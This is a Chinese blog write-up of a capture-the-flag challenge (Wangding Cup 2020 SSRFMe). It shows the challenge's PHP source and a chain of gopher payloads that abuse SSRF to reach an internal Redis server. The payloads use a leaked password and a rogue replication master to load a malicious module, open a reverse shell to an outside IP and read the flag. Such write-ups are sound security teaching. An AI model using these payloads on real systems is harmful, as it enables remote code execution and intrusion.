[网鼎杯 2020 玄武组]SSRFMe

最新推荐文章于 2024-04-09 23:09:37 发布
最新推荐文章于 2024-04-09 23:09:37 发布
阅读量452 收藏
点赞数 2
分类专栏: SSRF # ctf做题记录 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/117330604
版权
本文探讨了一次PHP脚本通过Redis RCE漏洞,利用Gopher协议进行内网渗透并尝试反弹shell的过程。作者展示了如何构造payload利用主从复制,并最终尝试获取flag。关键步骤包括URL检查、payload构建和漏洞利用技巧。
摘要由CSDN通过智能技术生成

第一次做redis相关的题目。
主要考点是redis主从复制rce

<?php
function check_inner_ip($url)
{
    $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);
    if (!$match_result)
    {
        die('url fomat error');
    }
    try
    {
        $url_parse=parse_url($url);
    }
    catch(Exception $e)
    {
        die('url fomat error');
        return false;
    }
    $hostname=$url_parse['host'];
    $ip=gethostbyname($hostname);
    $int_ip=ip2long($ip);
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
}

function safe_request_url($url)
{

    if (check_inner_ip($url))
    {
        echo $url.' is inner ip';
    }
    else
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        $output = curl_exec($ch);
        $result_info = curl_getinfo($ch);
        if ($result_info['redirect_url'])
        {
            safe_request_url($result_info['redirect_url']);
        }
        curl_close($ch);
        var_dump($output);
    }

}
if(isset($_GET['url'])){
    $url = $_GET['url'];
    if(!empty($url)){
        safe_request_url($url);
    }
}
else{
    highlight_file(__FILE__);
}
// Please visit hint.php locally.
?>

这里检查url是否是内网,直接用http://0.0.0.0/hint.php可以看到hint

string(1342) " <?php
if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){
  highlight_file(__FILE__);
}
if(isset($_POST['file'])){
  file_put_contents($_POST['file'],"<?php echo 'redispass is root';exit();".$_POST['file']);
}
"

得到redis密码root。知道这题跟redis相关了,之前没做过,看网上的wp。主从复制相关的知识和攻击的工具网上有很多。可以用
https://github.com/Dliv3/redis-rogue-server这个工具来伪造redis服务
我的payload:

gopher://0.0.0.0:6379/_auth%2520root%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit
gopher://0.0.0.0:6379/_auth%2520root%250Aconfig%2520set%2520dbfilename%2520exp.so%250Aslaveof%2520124.70.40.5%252021000%250Aquit
gopher://0.0.0.0:6379/_auth%2520root%250Amodule%2520load%2520%252Ftmp%252Fexp.so%250Asystem.rev%2520124.70.40.5%25206666%250Aquit

gopher://0.0.0.0:6379/_auth root
config set dir /tmp/
quit
//设置备份文件路径为/tmp/ 顺便说一下看到当时大佬的博客说试了很多目录,最后发现只有/tmp有权限 ,只需要有读权限即可,所以说平时做渗透或者做题好多试试啊

gopher://0.0.0.0:6379/_auth root
config set dbfilename exp.so
slaveof 174.1.185.67 6666
quit
//设置备份文件名为:exp.so,设置主redis地址为174.1.185.67,端口为6666 地址为buu开启的linux lab地址

gopher://0.0.0.0:6379/_auth root
module load /tmp/exp.so
system.rev 174.1.185.67 6663
quit
//导入 exp.so ,反弹shell到174.1.185.67:6663

url编码两次就能打了。在buu上复现的,反弹shell没成功
到第三部反弹shell不成功 一直报错。但看到网页有报错回显,所以我想的是第三步直接改成:

gopher://0.0.0.0:6379/_auth root
module load /tmp/exp.so
system.rev 174.1.185.67 6663
system.exec 'cat /flag'
quit

直接在网页上拿到flag。
在这里插入图片描述

fmyyy1
关注
专栏目录
网鼎杯网络安全大赛玄武-SSRFME
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 1596
网鼎杯网络安全大赛玄武-SSRFME题 index.php可绕过本地条件判断,以下是源码:
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 2454
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
CTF-2020网鼎杯-玄武-web题-ssrfme知识回顾
山下南徒的博客
05-31 3344
CTF-2020网鼎杯-玄武祖-web题-ssrfme知识回顾 思路:SSRF结合redis主从复制RCE Tip:使用DNS重绑定绕过限制 参考笔记:redis 主服务器:192.168.8.103 从服务器:192.168.8.104,redis 5.0.8(bind 0.0.0.0,关闭安全模式),centos 7(关闭防火墙) 第一步:使用脚本redis-rogue-server伪装redis主服务器: python3 redis-rogue-server.py --server-only 第二步:
BUU刷题 [网鼎杯 2020 玄武]SSRFMe
weixin_48631429的博客
01-24 530
直接给了源码,提示本地访问hint.php DNS重绑定漏洞察看hint.php: url=http://0.0.0.0/hint.php 提示redispass is root ssrf 打redis。 直接利用工具 https://github.com/xmsec/redis-ssrf https://github.com/n0b0dyCN/redis-rogue-server 将ssrf-redis.py中的对应位置更改 将下面的exp.so和上面的rogue-server.py,ssrf-red
buuctf [网鼎杯 2020 玄武]SSRFMe
qq_52671379的博客
04-23 3604
buuctf [网鼎杯 2020 玄武]SSRFMe
[网鼎杯 2020 玄武]SSRFMe【redis主从复制ssrf】
whowhenhow5的博客
11-15 1467
参考博客: https://blog.csdn.net/qq_41891666/article/details/107103116 https://zhuanlan.zhihu.com/p/112055947 https://blog.csdn.net/weixin_42345596/article/details/111312263 属于是被buu恶心坏了,为什么这么多人说只能内网打呜呜呜 打开页面是一个php源码,大概是要绕过这个check_inner_ip,一看到这个parse_url直接根据这个函数
2022年第三届“网鼎杯”网络安全大赛(玄武)【re557】
09-11
"2022年第三届‘网鼎杯’网络安全大赛(玄武)【re557】"这一标题和描述指向的是一项网络安全竞赛,其中"网鼎杯"是中国国内知名的网络安全赛事之一,每年举办,旨在提升参赛者的网络安全技能和应对网络威胁的能力...
2022网鼎杯初赛玄武赛题
10-18
2022网鼎杯初赛玄武赛题
2020年第二届“网鼎杯”网络安全大赛重磅启动.pdf
09-19
2020年第二届“网鼎杯”网络安全大赛,作为国家级品牌赛事,由多个官方机构和企业联合主办和协办,显示了中国在网络安全领域的重视及对优秀网络安全人才的需求。 “网鼎杯”这一赛事的举办,为各行业参赛者提供了一...
[网鼎杯 2020 玄武]SSRFMe-反弹shell
最新发布
2202_75361164的博客
04-09 430
- 因为用常规方法一直写不出来,所以就换了一种
[HITCON 2017]SSRFme
Sk1y的博客
01-14 1017
[HITCON 2017]SSRFme 文章目录[HITCON 2017]SSRFmepathinfo()函数payload参考文章 打开题目,就是源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_hea
ssrfme
o3Ev的博客
05-02 444
ssrfme 题目: 打开环境,得到: <?php if(isset($_GET) && !empty($_GET)){ $url = $_GET['file']; $path = "upload/".$_GET['path']; }else{ show_source(__FILE__); exit(); } if(strpos($path,'..') > -1){ die('This is a waf!'); } if(
[De1CTF 2019]SSRF Me
qq_43801002的博客
05-08 206
#题目:直接给代码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaul...
ssrfme(flask代码审计)
weixin_52780973的博客
10-31 617
简单的flask框架代码审计
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值